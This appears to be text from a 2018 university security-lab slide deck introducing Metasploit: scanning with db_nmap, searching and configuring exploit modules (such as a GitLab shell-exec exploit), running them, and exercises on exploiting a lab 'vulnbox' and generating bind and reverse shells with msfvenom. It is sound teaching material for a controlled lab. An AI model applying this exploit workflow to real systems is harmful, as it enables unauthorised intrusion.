Introduction to Metasploit Stefano Cristalli November 29, 2018 - PowerPoint PPT Presentation

Introduction to Metasploit Stefano Cristalli November 29, 2018 Laboratorio di Sicurezza e Reti — Universit` a degli Studi di Milano

Table of contents 1. Basic commands in the Metasploit console 2. DEMO: exploiting Heartbleed 3. Exercises 4. DEMO: creating a simple trojan 5. Exercises 1

Basic commands in the Metasploit console

Discovery Command db nmap . Like standard nmap , but interfaced with Metasploit’s db db nmap -v -sV 192.168.19.128 -v verbose output -sV tries to determine service/version info 2

Exploit search Commands search and use . msf > search gitlab msf > use exploit/multi/http/gitlab shell exec Once we know which service to attack, it is time to search for exploits. 3

Exploit configuration Before executing the exploit, we must configure options. Examples: set RHOST 192.168.19.128 set RPORT 8080 Commands info and show options will give us information on the exploit and on its options. It’s also a good idea sometimes to see what the exploit does by looking at its code, with command edit . 4

Exploit test and execution We can perform a check of the vulnerability. Not always present, and remember to always check the implementation! msf > check If we want to actually run the exploit, the command is run : msf > run 5

DEMO: exploiting Heartbleed

Exercises

Exercises 1. Scan vulnbox for services. Which ones can you identify? 2. Try to exploit the running services. Can you find a working exploit? 3. The Apache server we have already analyzed runs a CGI script at /cgi-bin/hello.sh It’s just an hello world, so the code is not vulnerable. Maybe the underlying program is a bit... old ? 6

DEMO: creating a simple trojan

Exercises

Exercises 1. Analyze /home/user/vuln/vuln.c on vulnbox. What does the program do? 2. Exploit the program. Spawn a shell by generating a payload with msfvenom. 3. A local shell isn’t enough. Produce and test shellcodes for bind and reverse remote shells. 7